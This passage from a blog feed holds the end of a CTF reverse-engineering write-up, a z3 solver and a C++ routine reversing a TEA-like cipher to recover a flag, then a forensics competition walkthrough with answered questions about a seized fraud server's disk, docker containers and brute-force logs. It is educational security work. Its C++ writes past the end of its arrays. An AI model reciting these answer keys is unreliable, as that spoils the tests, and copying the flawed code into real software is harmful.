a1[<span class="number">2</span>] - a1[<span class="number">4</span>] != <span class="number">0x42D731A8</span>LL )</span><br><span class="line">  {</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">"Wrong!"</span>);</span><br><span class="line">    result = <span class="number">0LL</span>;</span><br><span class="line">  }</span><br><span class="line">  <span class="keyword">else</span> <span class="keyword">if</span> ( *a1 != <span class="number">0xDF48EF7E</span> || a1[<span class="number">5</span>] != <span class="number">0x84F30420</span> || a1[<span class="number">1</span>] != <span class="number">0x20CAACF4</span> )</span><br><span class="line">  {</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">"Wrong!"</span>);</span><br><span class="line">    result = <span class="number">0LL</span>;</span><br><span class="line">  }</span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">  {</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">"good!"</span>);</span><br><span class="line">    result = <span class="number">1LL</span>;</span><br><span class="line">  }</span><br><span class="line">  <span class="keyword">return</span> result;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>Three words are fixed outright and the other three are tied by two differences and a sum, so, as the hint suggests, solve the equations with <code>z3</code>:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> z3 <span class="keyword">import</span> *</span><br><span class="line">s=Solver()</span><br><span class="line">x0 = Int(<span class="string">'x0'</span>)</span><br><span class="line">x1 = Int(<span class="string">'x1'</span>)</span><br><span class="line">x2 = Int(<span class="string">'x2'</span>)</span><br><span class="line">x3 = Int(<span class="string">'x3'</span>)</span><br><span class="line">x4 = Int(<span class="string">'x4'</span>)</span><br><span class="line">x5 = Int(<span class="string">'x5'</span>)</span><br><span class="line">s.add(x0==<span class="number">0xDF48EF7E</span>)</span><br><span class="line">s.add(x5==<span class="number">0x84F30420</span>)</span><br><span class="line">s.add(x1==<span class="number">0x20CAACF4</span>)</span><br><span class="line">s.add(x2-x3==<span class="number">0x84A236FF</span>)</span><br><span class="line">s.add(x3+x4==<span class="number">0xFA6CB703</span>)</span><br><span class="line">s.add(x2-x4==<span class="number">0x42D731A8</span>)</span><br><span class="line"><span class="keyword">if</span> s.check() == sat:</span><br><span class="line">    m = s.model()</span><br><span class="line">    print(m)</span><br><span class="line"><span class="string">'''</span></span><br><span class="line"><span class="string">[x2 = 3774025685,</span></span><br><span class="line"><span class="string"> x3 = 1548802262,</span></span><br><span class="line"><span class="string"> x4 = 2652626477,</span></span><br><span class="line"><span class="string"> x1 = 550153460,</span></span><br><span class="line"><span class="string"> x5 = 2230518816,</span></span><br><span class="line"><span class="string"> x0 = 3746099070]</span></span><br><span class="line"><span class="string"> '''</span></span><br></pre></td></tr></table></figure><p>That gives <code>flag_enc</code>; now the <code>change</code> function:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">__int64 __fastcall <span class="title">change</span><span class="params">(<span class="keyword">unsigned</span> <span 
class="keyword">int</span> *ini, _DWORD *tables)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> __int64 result; <span class="comment">// rax</span></span><br><span class="line"> <span class="keyword">unsigned</span> <span class="keyword">int</span> var; <span class="comment">// [rsp+1Ch] [rbp-24h]</span></span><br><span class="line"> <span class="keyword">unsigned</span> <span class="keyword">int</span> var_1; <span class="comment">// [rsp+20h] [rbp-20h]</span></span><br><span class="line"> <span class="keyword">int</span> tmp; <span class="comment">// [rsp+24h] [rbp-1Ch]</span></span><br><span class="line"> <span class="keyword">unsigned</span> <span class="keyword">int</span> i; <span class="comment">// [rsp+28h] [rbp-18h]</span></span><br><span class="line"></span><br><span class="line"> var = *ini;</span><br><span class="line"> var_1 = ini[<span class="number">1</span>];</span><br><span class="line"> tmp = <span class="number">0</span>;</span><br><span class="line"> <span class="keyword">for</span> ( i = <span class="number">0</span>; i <= <span class="number">63</span>; ++i )</span><br><span class="line"> {</span><br><span class="line"> tmp += <span class="number">0x458BCD42</span>;</span><br><span class="line"> var += (var_1 + tmp + <span class="number">11</span>) ^ ((var_1 << <span class="number">6</span>) + *tables) ^ ((var_1 >> <span class="number">9</span>) + tables[<span class="number">1</span>]) ^ <span class="number">0x20</span>;</span><br><span class="line"> var_1 += (var + tmp + <span class="number">20</span>) ^ ((var << <span class="number">6</span>) + tables[<span class="number">2</span>]) ^ ((var >> <span class="number">9</span>) + tables[<span class="number">3</span>]) ^ <span class="number">0x10</span>;</span><br><span class="line"> }</span><br><span class="line"> *ini = var;</span><br><span class="line"> result = var_1;</span><br><span class="line"> ini[<span class="number">1</span>] = 
var_1;</span><br><span class="line"> <span class="keyword">return</span> result;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>对<code>change</code>函数的三行关键代码进行分析,发现<code>var_1</code>的处理只与此时<code>var</code>的值有关,其余都是常量;<code>var</code>的处理只与此时<code>var_1</code>值有关,其余都是常量。所以直接把加号变成减号就<code>ok</code>了。</p><p>然后还有一点需要注意的就是在<code>IDA</code>里面你的数据数据类型是什么,你在写<code>exp</code>的时候数据就用什么数据类型,否则可能会出锅。</p><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><bits/stdc++.h></span></span></span><br><span class="line"><span class="keyword">using</span> <span class="keyword">namespace</span> <span class="built_in">std</span>;</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span>{</span><br><span class="line"><span class="keyword">unsigned</span> <span 
class="keyword">int</span> flag_enc[<span class="number">5</span>],flag[<span class="number">5</span>];</span><br><span class="line">flag_enc[<span class="number">0</span>]=<span class="number">3746099070</span>;flag_enc[<span class="number">1</span>]=<span class="number">550153460</span>;flag_enc[<span class="number">2</span>]=<span class="number">3774025685</span>;flag_enc[<span class="number">3</span>]=<span class="number">1548802262</span>;flag_enc[<span class="number">4</span>]=<span class="number">2652626477</span>;flag_enc[<span class="number">5</span>]=<span class="number">2230518816</span>;</span><br><span class="line"><span class="keyword">unsigned</span> <span class="keyword">int</span> var[<span class="number">3</span>];</span><br><span class="line"><span class="keyword">unsigned</span> <span class="keyword">int</span> tables[<span class="number">4</span>]={<span class="number">2</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="number">4</span>};</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<<span class="number">5</span>;i+=<span class="number">2</span>){</span><br><span class="line"><span class="keyword">int</span> tmp = <span class="number">0x458BCD42</span>*<span class="number">64</span>;</span><br><span class="line">var[<span class="number">0</span>]=flag_enc[i];</span><br><span class="line">var[<span class="number">1</span>]=flag_enc[i+<span class="number">1</span>];</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> j=<span class="number">0</span>;j<=<span class="number">0x3F</span>;j++){</span><br><span class="line">var[<span class="number">1</span>] -= (var[<span class="number">0</span>] + tmp + <span class="number">20</span>) ^ ((var[<span class="number">0</span>] << <span class="number">6</span>) + tables[<span class="number">2</span>]) ^ ((var[<span class="number">0</span>] >> <span 
class="number">9</span>) + tables[<span class="number">3</span>]) ^ <span class="number">0x10</span>;</span><br><span class="line">var[<span class="number">0</span>] -= (var[<span class="number">1</span>] + tmp + <span class="number">11</span>) ^ ((var[<span class="number">1</span>] << <span class="number">6</span>) + tables[<span class="number">0</span>]) ^ ((var[<span class="number">1</span>] >> <span class="number">9</span>) + tables[<span class="number">1</span>]) ^ <span class="number">0x20</span>;</span><br><span class="line">tmp-=<span class="number">0x458BCD42</span>;</span><br><span class="line">}</span><br><span class="line">flag[i]=var[<span class="number">0</span>];</span><br><span class="line">flag[i+<span class="number">1</span>]=var[<span class="number">1</span>];</span><br><span class="line">}</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<<span class="number">6</span>;i++)</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"0x%x\n"</span>,flag[i]);</span><br><span class="line">}</span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">0x666c61</span></span><br><span class="line"><span class="comment">0x677b72</span></span><br><span class="line"><span class="comment">0x655f69</span></span><br><span class="line"><span class="comment">0x735f67</span></span><br><span class="line"><span class="comment">0x726561</span></span><br><span class="line"><span class="comment">0x74217d</span></span><br><span class="line"><span class="comment">*/</span></span><br></pre></td></tr></table></figure><p>再用<code>sublime</code>处理一下,用<code>python</code>稍微跑一下:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span 
class="line">flag=[<span class="number">0x66</span>,<span class="number">0x6c</span>,<span class="number">0x61</span>,<span class="number">0x67</span>,<span class="number">0x7b</span>,<span class="number">0x72</span>,<span class="number">0x65</span>,<span class="number">0x5f</span>,<span class="number">0x69</span>,<span class="number">0x73</span>,<span class="number">0x5f</span>,<span class="number">0x67</span>,<span class="number">0x72</span>,<span class="number">0x65</span>,<span class="number">0x61</span>,<span class="number">0x74</span>,<span class="number">0x21</span>,<span class="number">0x7d</span>]</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> flag:</span><br><span class="line">print(<span class="built_in">chr</span>(i),end=<span class="string">''</span>)</span><br><span class="line"><span class="comment"># flag{re_is_great!}</span></span><br></pre></td></tr></table></figure>]]></content>
<categories>
<category> CTF Study Notes </category>
</categories>
<tags>
<tag> CTF </tag>
<tag> RE </tag>
</tags>
</entry>
<entry>
<title>1st Chang'an Cup Digital Forensics Competition</title>
<link href="2021/02/21/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B%E9%A2%98%E8%A7%A3/"/>
<url>2021/02/21/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B%E9%A2%98%E8%A7%A3/</url>
<content type="html"><![CDATA[<blockquote><p><strong>Case summary</strong></p><p>In a telecom fraud case, the victim reported that their bank card had been used fraudulently by someone else. They had received a text message impersonating the public security bureau: because the victim invested through a P2P website, the fake police claimed that the site had been listed as an illegal website and told them to enter their details on a "police registration" website, which would help them recover their principal. Taking this at face value, the victim entered their personal information and the details of their linked bank card on that site. Investigators suspect that the suspect obtained the registered-user information from the P2P website and used it for targeted fraud, so they seized the P2P investment website's server, and you have been assigned to carry out digital forensics on it.</p></blockquote><h2 id="Part-1"><a href="#Part-1" class="headerlink" title="Part 1"></a>Part 1</h2><p>You have obtained the hard-disk image file “检材 1.E01” (evidence item 1) of the <code>P2P</code> investment website's server. Based on this image, answer the following questions:</p><blockquote><ol><li>What is the SHA256 value of the “检材 1.E01” image? ( <strong>C</strong> )<br> A. <code>2b20022249e3e5d66d4bbed34ad337be5dd77b313c92dfe929aa56ed71449697</code><br>B. <code>6a574c40548110598bd4c88520d34b37d13b372066737ede3104743f986b7263</code><br>C. <code>5ee0b3809807bf8a39453695c5835cddfd33f65b4f5bee8b5670625291a6bc1c</code><br>D. <code>8495b678da27c64b54f083afefbcf9f83f94c1de133c70c175b4a784551939dd</code></li></ol></blockquote><p> Load the image in Forensics Master (取证大师), right-click and compute <code>SHA256</code>:<img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201017152420222.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201017152420222.png" srcset="" alt="image-20201017152420222"></p><blockquote><ol start="2"><li><p>What is the operating system version of this server? ( <strong>D</strong> )<br> A. <code>CentOS release 6.5 (Final)</code><br>B. <code>Ubuntu 16.04.3 LTS</code><br>C. <code>Debian GNU/Linux 7.8 (wheezy)</code><br>D. <code>CentOS Linux release 7.6.1810(Core)</code></p></li><li><p>What is the server's kernel version? (<strong>A</strong>)</p><p>A. <code>3.10.0-957.el7.x86_64</code></p><p>B. <code>3.2.0-4-amd64</code></p><p>C. <code>4.8.0-52-generic</code></p><p>D. <code>4.10.0-28-generic</code></p></li></ol></blockquote><p> Generate a virtual machine with Huoyan (火眼) emulation and open it in <code>VM</code>:<img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201017152333820.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201017152333820.png" srcset="" alt="image-20201017152333820"></p><blockquote><ol start="4"><li><p>How many disk partitions did the original server have? (<strong>B</strong>)</p><p><code>A.1 B.2 C.3 D.4</code></p></li></ol></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201017152729625.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201017152729625.png" srcset="" alt="image-20201017152729625"></p><blockquote><ol start="5"><li><p>One of the original server's disk partitions contains an LVM logical volume. Find the starting logical block address <code>(LBA)</code> of that partition. (Answer format: sector, <code>Sector</code>) (<strong>C</strong>)</p><p><code>A.0 B.2048 C.2099200 D.4194344</code></p></li></ol></blockquote><p>Logical block addressing <code>(Logical Block Address, LBA)</code> is the general scheme for describing where a block of data sits on a computer storage device; it is typically used for secondary storage such as hard disks. <code>LBA</code> can refer either to the address of a data block or to the data block that an address points to.</p><p>Looking it up shows the partition the question refers to: <code>FMP</code> evidence file -> expand the image -> select Partition 2 -> Summary -> view Physical location:<img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201017154251946.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201017154251946.png" srcset="" alt="image-20201017154251946"></p><p>However, this physical address is given in bytes <code>(Byte)</code>, while one logical block is 512 bytes, so the value has to be divided by 512.</p><p><code>1074790400/512=2099200</code></p><blockquote><ol start="6"><li><p>What file system does the <code>root</code> logical volume in that <code>LVM</code> partition use? (<strong>D</strong>)</p><p><code>A.NTFS B.EXT4 C.SWAP D.XFS</code></p></li></ol></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201017154443455.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201017154443455.png" srcset="" alt="image-20201017154443455"></p><blockquote><ol start="7"><li><p>What is the physical size of the <code>root</code> logical volume in that <code>LVM</code> partition? (unit: <code>byte</code>) (<strong>C</strong>)</p><p> <code>A. 2,147,483,648 B. 2,147,504,128</code> </p><p> <code>C. 18,249,416,704 D. 20,400,046,080</code></p></li></ol></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201017154833743.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201017154833743.png" srcset="" alt="image-20201017154833743"></p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201017155102368.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201017155102368.png" srcset="" alt="image-20201017155102368">This is closest to option <code>C</code>.</p><blockquote><ol start="8"><li><p>Find the port on which the server's website is accessed. (<strong>D</strong>)</p><p><code>A.22 B.25 C.80 D.8091</code></p></li></ol><ol start="9"><li><p>The server runs the <code>docker</code> application; how many <code>docker</code> images are stored locally? (<strong>B</strong>)</p><p><code>A.10 B.11 C.12 D.13</code></p></li></ol><ol start="15"><li>Among the running container nodes, what service does the container with <code>ID</code> <code>15debb1824e6</code> run? (<strong>C</strong>)</li></ol><p><code> A. ftp B. ssh C. nginx D. smtp</code></p><ol start="16"><li><p>Which host port does the container node from the previous question occupy? (<strong>C</strong>)</p><p>A.22 B.8091 C.39999 D. No port occupied</p></li></ol><ol start="17"><li><p>The website on this server runs inside a <code>docker</code> container; which application provides the <code>web</code> service? (<strong>C</strong>)</p><p><code>A. apache B. tomcat C. nginx D. IIS</code></p></li></ol><ol start="18"><li>What is the name of the image used by the container node that runs the <code>web</code> service? <code>(format REPOSITORY:TAG)</code> (<strong>D</strong>)<br><code>A. apache: latest B. tomcat: jessie-slim C. nginx: jessie-slim D. nginx: latest</code></li></ol><ol start="19"><li><p>Which container port does that container node occupy? (<strong>B</strong>)</p><p>A.22 B.80 C.8091 D. No port occupied</p></li></ol></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201017155706179.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201017155706179.png" srcset="" alt="image-20201017155706179"></p><p>In the output of <code>docker ps</code>, the <code>PORTS</code> column shows two ports: the one prefixed with <code>0.0.0.0</code> is the host's own port, and the port it forwards to is the <code>docker</code> container's port.</p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201017160427657.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201017160427657.png" srcset="" alt="image-20201017160427657"></p><blockquote><ol start="10"><li><p>What is the <code>server</code> version of the <code>docker</code> application? (<strong>B</strong>)</p><p><code>A.16.05.2 B.17.03.08 C.18.09.7 D.19.03.3</code></p></li></ol><ol start="11"><li><p>How many container nodes are there in total in this <code>docker</code> application? (<strong>A</strong>)</p><p><code>A.10 B.11 C.12 D.13</code></p></li></ol><ol start="12"><li><p>How many container nodes are running? (<strong>D</strong>)</p><p><code>A.1 B.2 C.3 D.4</code></p></li></ol></blockquote><p>Command: <code>docker info</code>:</p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201017160217024.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201017160217024.png" srcset="" alt="image-20201017160217024"></p><blockquote><ol start="20"><li><p>The path of the website directory inside its container is (format: container ID:path) (<strong>B</strong>)</p><p><code>A. d1085c1a8828:/home/ vue2-element-touzi-admin</code></p><p><code>B. 53766d68636f:/ home/ vue2-element-touzi-admin</code></p><p><code>C. 16fc160060c1:/var/www/ vue2-element-touzi-admin</code></p><p> <code>D. 15debb1824e6: /var/www/ vue2-element-touzi-admin</code></p></li></ol></blockquote><p>Enter the three running containers and look for it:</p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201017220356116.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201017220356116.png" srcset="" alt="image-20201017220356116"></p><blockquote><ol start="21"><li><p>Which of the following is the path of the website directory on the host? (<strong>A</strong>)</p><p><code>A. /var/lib/docker/overlay2/cca977c8ca4a251023000285fbc8b4556636e1adc53cb012c84133a7b857abfc/diff/home/vue2-element-touzi-admin</code></p><p><code> B. /var/lib/docker/overlay2/fd27756120785ef656c9211b6147ef5f38d6a9811006d85359458f7fa8d45415/diff/home/vue2-element-touzi-admin</code></p><p><code> C. /var/lib/docker/overlay2/f405ba5e3f1f0e04a3585fbc95a47d13b4009dd9d599ac91015babebd5a5ff9b/diff/var/www/ vue2-element-touzi-admin</code></p><p><code> D. /var/lib/docker/overlay2/d42b9a02aa87386b137242f691cb3e6303c4c0f3441419efb17ff550fdf5de28/diff/var/www/ vue2-element-touzi-admin</code></p></li><li><p>Where is the website log? (format: container ID:path) (<strong>C</strong>)</p><pre><code>A. 53766d68636f:/etc/nginx/logs/jrweb.log B. 53766d68636f:/var/log/access.log C. 16fc160060c1:/etc/nginx/logs/jrweb.log D. 16fc160060c1:/var/log/access.log</code></pre></li></ol></blockquote><p>Search for “投资” (“investment”, i.e. “<code>jrweb</code>”) in Forensics Master:<img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201017214438176.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201017214438176.png" srcset="" alt="image-20201017214438176"></p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201017214531352.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201017214531352.png" srcset="" alt="image-20201017214531352"></p><p>Question 22 is answered the same way as question 21.</p><blockquote><ol start="23"><li><p>What was the server's original <code>IP</code> address at the time of the incident? (<strong>D</strong>)</p><p><code>A.192.168.160.89 B.192.168.184.100 C.192.168.120.111 D.192.168.184.128</code></p></li></ol></blockquote><p>Look at the log file from the previous question:<img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201021111229033.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201021111229033.png" srcset="" alt="image-20201021111229033"></p><p>Password-guessing activity is clearly visible here, so this is the “time of the incident”, and the <code>IP</code> address at that moment is <code>192.168.184.128:8091</code>.</p><blockquote><ol start="24"><li><p>In <code>docker</code>, what network mode connects the container nodes to the host? (<strong>A</strong>)</p><p><code>A. bridge mode B. host mode C. container mode D. none mode</code></p></li></ol></blockquote><blockquote><p><code>$ docker inspect ID</code></p></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201021103821517.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201021103821517.png" srcset="" alt="image-20201021103821517"></p><blockquote><ol start="25"><li><p>When we want to reconstruct the website, what role does the web application play when the site is accessed? (<strong>B</strong>) </p><p>A. Running the website B. Forwarding C. Reverse proxy D. Load balancing</p></li></ol></blockquote><blockquote><ol start="26"><li><p>From the website logs, the IP the suspect used to break into the server is (<strong>C</strong>)</p><p><code>A.192.168.184.1 B.192.168.160.89 C.192.168.184.133 D.192.168.160.169</code></p></li></ol></blockquote><p>In the log above we can clearly see <code>192.168.184.133</code> brute-forcing the <code>password</code> of the <code>admin</code> user:</p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201021111229033.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201021111229033.png" srcset="" alt="image-20201021111229033"></p><blockquote><ol start="27"><li><p>Which file in the website directory is the site's main configuration file? (relative path) (<strong>C</strong>)</p><p><code>A./config/index.js B./server/api.js C./server/index.js D./src/main.js</code></p></li><li><p>What database does the website use? (<strong>B</strong>)</p><p><code>A.mysql B.oracle C.mongodb D.redis</code></p></li></ol></blockquote><p>Projects are generally <code>clone</code>d from <code>github</code>, so the root directory should be under the <code>home</code> folder; opening <code>README.md</code> we find:</p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201021113125958.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201021113125958.png" srcset="" alt="image-20201021113125958"></p><p>Checking each of the four options from question 27, only <code>/server/index.js</code> has all the imports, so that should be the main configuration file (wrong ×)</p><p>What is meant here is the <code>node js</code> configuration file, so it should be under the <code>/server</code> directory; comparing the three files there, it is clearly option <code>C</code>.</p><blockquote><ol start="29"><li><p>What port does the database use? (<strong>D</strong>)</p><p><code>A.1521 B.3306 C.6379 D.27017</code></p></li><li><p>What is the IP of the server the database runs on? 